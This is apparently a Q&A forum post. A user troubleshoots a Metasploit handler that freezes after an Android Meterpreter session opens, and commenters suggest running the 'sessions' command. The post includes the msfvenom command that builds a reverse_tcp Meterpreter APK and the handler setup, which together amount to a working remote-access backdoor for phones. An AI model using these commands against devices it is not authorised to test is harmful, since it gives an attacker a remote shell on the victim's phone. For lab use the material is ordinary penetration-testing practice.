# Metasploit opens Meterpreter, but the shell is unresponsive

Tags: metasploit, meterpreter

I created a payload using

```
msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 R > ANDROID.apk
```

signed the apk, sent it to my phone, opened up `msfconsole` and ran

```
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.2
exploit
```

After this, I installed the apk and opened it on my phone, and got something similar to this:

```
msf exploit(handler)  > [*] Sending stage (179267 bytes) to [target IP]

[*] Meterpreter session 1 opened  ( [attacker IP:port] -> [target IP: port] ) at 2021-6-03 17:54:27 -0300
```

I can't type `sessions -i 1` (like [here](https://security.stackexchange.com/questions/169838/metasploit-opens-meterpreter-but-shows-no-prompt-please-help)) because when I type stuff in the console, pressing enter does nothing. Opening a new `msfconsole` works, but it says `there are no active sessions`.

Comment: What exactly is your question?

Comment: Opening a msfconsole will not help you out as it does not keep the state of previous sessions.

Could you please and once you have obtained a message like this one:
[*] Meterpreter session 1 opened  ( [attacker IP:port] -> [target IP: port] ) at 2021-6-03 17:54:27 -0300

Press Enter twice and after run the sessions command (ONLY the sessions command, without -i)within the MSF console? It should print all the available sessions including the new one.